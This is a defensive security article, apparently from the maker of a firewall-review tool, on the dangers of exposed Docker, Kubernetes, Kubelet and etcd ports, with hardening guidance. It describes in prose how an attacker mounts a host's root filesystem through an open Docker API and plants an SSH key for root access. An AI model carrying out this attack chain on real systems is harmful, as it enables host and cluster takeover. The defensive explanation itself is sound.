Container and Orchestration APIs: When One Open Port Means Full Cluster Access

Not every open port is created equal
In traditional network security, an open port usually means a service is listening and might be vulnerable. An exposed SSH port might be brute-forced. An open database port might allow unauthorised queries. These are serious, but they tend to have layers of defence: authentication, authorisation, rate limiting, logging.
Container orchestration APIs are different. When Docker's API listens on port 2375 without TLS or authentication, a single HTTP request can deploy a container with the host's filesystem mounted as a volume. That is not a vulnerability to exploit. That is the API working exactly as designed, just for the wrong person. The attacker does not need a CVE, a zero-day, or a password. They need a TCP connection.
This distinction matters because traditional port-based risk assessments do not capture it. A spreadsheet that says "port 2375 - Docker API - medium risk" is dangerously wrong. The risk is not medium. It is root access to the host and, from there, to every other host the Docker daemon can reach.
The ports and what they control
Four port ranges define the attack surface of a containerised environment. Each one represents a different level of control, and all of them are more dangerous than their port numbers suggest.
Docker API: ports 2375 and 2376. Port 2375 is the unencrypted Docker API. Port 2376 is the TLS-encrypted variant. The Docker daemon, by default, listens on a Unix socket that is only accessible locally. But enabling the TCP socket, which many tutorials and deployment guides recommend for remote management, exposes the full Docker API over the network. On port 2375, there is no encryption and no authentication. Anyone who can reach the port can do anything the Docker daemon can do: create containers, mount host volumes, execute commands, pull images, and inspect the environment.
Kubernetes API server: port 6443. The Kubernetes API server is the central control plane for the entire cluster. Every kubectl command, every deployment, every secret retrieval goes through this API. Port 6443 is the default HTTPS endpoint. Unlike Docker's port 2375, the Kubernetes API does have authentication and RBAC built in. But misconfigurations are common: anonymous authentication enabled, overly permissive ClusterRoleBindings, service account tokens leaked in logs or environment variables. When the API server is exposed to the internet with any of these misconfigurations, the attacker has cluster-admin access.
Kubelet API: port 10250. The kubelet runs on every node in a Kubernetes cluster and manages the pods on that node. Its API on port 10250 allows direct interaction with running pods, including executing commands inside them. In many cluster configurations, the kubelet's API has weaker authentication than the main API server. Attackers who cannot reach port 6443 may find port 10250 exposed on individual nodes, giving them the ability to run commands in any pod on that node without going through the API server's RBAC controls.
etcd: ports 2379 and 2380. etcd is the key-value store that holds all Kubernetes cluster state. Every secret, every configuration, every service account token is stored in etcd. Port 2379 is the client API. Port 2380 is the peer communication port used for etcd cluster replication. If an attacker can reach port 2379, they can read every secret in the cluster, including TLS certificates, database passwords, API keys, and service account tokens. They do not need to interact with Kubernetes at all. They read the secrets directly from the backing store.
Docker API: from one port to full root access
The Docker API on port 2375 is the clearest example of how container APIs differ from traditional services. Here is what an attack actually looks like, step by step.
An attacker scans a network range and finds port 2375 open. They send a single API call to create a new container using a minimal Linux image, with the host's root filesystem mounted at /mnt/host inside the container. The API responds with a container ID. They start the container. They execute a command inside the container that writes an SSH key to /mnt/host/root/.ssh/authorized_keys. They now have SSH access to the host as root.
The entire sequence takes less than 30 seconds and requires nothing more than curl. There is no exploit involved. No buffer overflow. No authentication bypass. The API did exactly what it was asked to do: create a container, mount a volume, run a command. The only problem is that the person asking was not authorised to do so, and the API had no mechanism to check.
This is not a hypothetical attack chain. Shodan consistently indexes thousands of Docker APIs exposed on port 2375. Automated scanning tools look for this port specifically because the payoff is immediate and guaranteed. Honeypot research has shown that exposed Docker APIs receive exploitation attempts within hours of appearing on the internet. The most common payload is a cryptominer, but the access level supports anything: data exfiltration, ransomware deployment, or using the compromised host as a pivot point for lateral movement.
Kubernetes API: legitimate access, catastrophic exposure
The Kubernetes API server on port 6443 presents a different challenge. Unlike Docker's port 2375, the Kubernetes API is meant to be network-accessible. Developers need to reach it to deploy applications. CI/CD pipelines need to reach it to push updates. Monitoring tools need to reach it to check cluster health. You cannot simply disable network access to the API server and call it secure.
The risk comes from who can reach it and what they can do when they get there.
A Kubernetes cluster where the API server is exposed to the internet and anonymous authentication is enabled allows anyone to query the cluster. Even without anonymous auth, common misconfigurations create equivalent exposure. Service account tokens with cluster-admin privileges get committed to Git repositories. RBAC policies grant * (all verbs) on * (all resources) to the default service account because someone needed to debug a pod and never reverted the change. Admission controllers are disabled because they were "slowing down deployments."
Each of these misconfigurations on its own might not be critical. Combined with an internet-exposed API server, they are catastrophic. An attacker with cluster-admin access can read all secrets (database passwords, API keys, TLS certificates), deploy workloads on any node, modify existing deployments to inject malicious containers, and delete resources to cause outages.
The Kubelet API on port 10250 compounds this risk. Even in clusters where the API server is properly secured, the kubelet on individual nodes may accept unauthenticated requests. An attacker who finds port 10250 open can list all pods on that node, execute commands inside any pod, and retrieve environment variables that often contain secrets. This is particularly dangerous in cloud environments where nodes may have instance metadata endpoints accessible from within pods, turning a kubelet compromise into a cloud account compromise.
etcd: the cluster's memory, wide open
If the Kubernetes API server is the front door to your cluster, etcd is the vault. It stores every piece of state the cluster manages: pod specifications, service definitions, config maps, and most critically, secrets.
Kubernetes secrets are base64-encoded by default, not encrypted. When you run kubectl create secret, the value is stored in etcd in a form that any client with read access can decode trivially. Encryption at rest for etcd is available but not enabled by default in many deployment methods. This means that direct access to etcd on port 2379 gives an attacker everything in the cluster without needing to authenticate to the Kubernetes API at all.
Port 2380, the peer port, is equally sensitive. If an attacker can reach port 2380, they can potentially join the etcd cluster as a new member, gaining full read and write access to all cluster data. This is not an attack that most organisations plan for because etcd peer communication is assumed to happen on a trusted network. But "assumed to be trusted" and "actually isolated" are different things, especially in cloud environments where network segmentation requires explicit configuration.
An etcd backup file that is accessible over the network is equivalent to a database dump that contains every password in the organisation. It deserves the same level of protection and the same level of alarm when it is found exposed.
Why traditional firewall reviews miss these ports
Most firewall rule reviews evaluate ports based on a risk classification that was designed for traditional services. Port 22 is SSH, requires authentication, medium risk. Port 443 is HTTPS, encrypted, low risk. Port 3306 is MySQL, requires authentication, medium-high risk.
Container orchestration ports do not fit this model. Port 2375 looks like "just another service port" in a rule review, but it grants unauthenticated root access. Port 6443 is HTTPS, which might even be classified as lower risk than unencrypted ports. Port 10250 is an obscure port number that many reviewers will not recognise at all. Port 2379 looks like any other application port.
This is where automated rule analysis becomes critical. netbobr includes specific checks for container orchestration ports. PCI-NET-054 flags rules that permit traffic to the Docker API on ports 2375 and 2376. PCI-NET-055 covers the Kubernetes API server on port 6443 and the Kubelet on port 10250. CIS-NET-034 and NIST-NET-044 address container API exposure broadly, catching rules that permit access to any of these ports from networks that should not have it. These checks exist because manual reviews consistently miss container ports, not out of negligence, but because the risk model most reviewers carry in their heads was built before containers existed.
Best practices for container API security
The security model for container orchestration APIs comes down to a simple principle: never expose these APIs to a network broader than the minimum set of hosts that need access. In practice, that means the following.
Docker API: do not use the TCP socket. The Docker daemon's default configuration uses a Unix socket at /var/run/docker.sock. This is accessible only to local processes with the appropriate permissions. There is almost never a legitimate reason to expose the Docker API on a TCP port. If you need remote Docker management, use SSH tunnelling to forward the Unix socket. If you absolutely must expose the TCP socket, use port 2376 with mutual TLS, where both the client and server present certificates. Never, under any circumstances, expose port 2375 on a network interface.
Kubernetes API server: restrict network access and harden authentication. The API server needs to be network-accessible, but it does not need to be accessible from everywhere. Use network policies or firewall rules to limit access to the API server to your operations network, your CI/CD pipeline source addresses, and your monitoring infrastructure. Disable anonymous authentication. Audit RBAC policies regularly and remove overly permissive bindings. Enable audit logging so you can detect unusual API access patterns.
Kubelet: enable authentication and authorisation. Configure the kubelet to use webhook authentication, which delegates auth decisions to the API server. Set the authorisation mode to Webhook rather than AlwaysAllow. Disable the read-only port (10255) entirely. These settings are not the default in all Kubernetes distributions, which means you need to verify them explicitly.
etcd: isolate completely. etcd should only be accessible from the Kubernetes API server nodes. No other system needs direct access to etcd. Use mutual TLS for both client and peer communication. If your etcd cluster runs on dedicated hosts, firewall them so that only the API server hosts can reach ports 2379 and 2380. If etcd runs on the same hosts as the API server (common in smaller clusters), bind etcd to localhost or a dedicated management interface.
Network policies as a second layer. Kubernetes network policies can restrict pod-to-pod communication within the cluster, providing defence in depth even if the perimeter is breached. Default-deny network policies that explicitly allow only the traffic each service needs are the container equivalent of a properly configured firewall ruleset. They take effort to build, but they prevent lateral movement within the cluster if a single pod is compromised.
The scanning problem you already have
If you have container workloads in production, there is a meaningful chance that at least one of these ports is more exposed than you realise. Cloud provider defaults, developer convenience settings, and infrastructure-as-code templates copied from public repositories all contribute to accidental exposure.
Run a port scan of your infrastructure looking for ports 2375, 2376, 6443, 10250, 10255, 2379, and 2380. Check both internal and external exposure. For cloud environments, review your security groups and network ACLs. For on-premises environments, check your firewall rulesets.
When you run your firewall rules through netbobr, the container-specific checks (PCI-NET-054, PCI-NET-055, CIS-NET-034, NIST-NET-044) will flag any rules that permit traffic to these ports from networks that should not have access. This catches the rules that a manual review might overlook, not because the reviewer is careless, but because a rule permitting TCP traffic to port 2375 from the developer VLAN does not look alarming unless you know what port 2375 does.
The asymmetry that matters
Traditional services have a roughly proportional relationship between access and impact. An attacker who reaches a web server can attack the web application. An attacker who reaches a database can attack the database. The blast radius is bounded by the service.
Container orchestration APIs break this proportionality. An attacker who reaches the Docker API on one host can compromise that host and every container on it. An attacker who reaches the Kubernetes API server can compromise the entire cluster. An attacker who reaches etcd can read every secret in every namespace. The blast radius is not bounded by the service. It is bounded by the infrastructure.
This asymmetry is why container API ports deserve their own category in your risk assessment, their own rules in your firewall policy, and their own line items in your security review checklist. Treating port 2375 the same as port 8080 is like treating the master key the same as the office key. They are both keys. They open very different things.
The organisations that manage this well are the ones that recognised early that container orchestration changed the security model, not just the deployment model. The ones that are struggling are the ones that deployed containers at speed, used the defaults, and never went back to check which ports were listening and who could reach them. If you have not checked recently, now is the time. The automated scanners have already checked for you.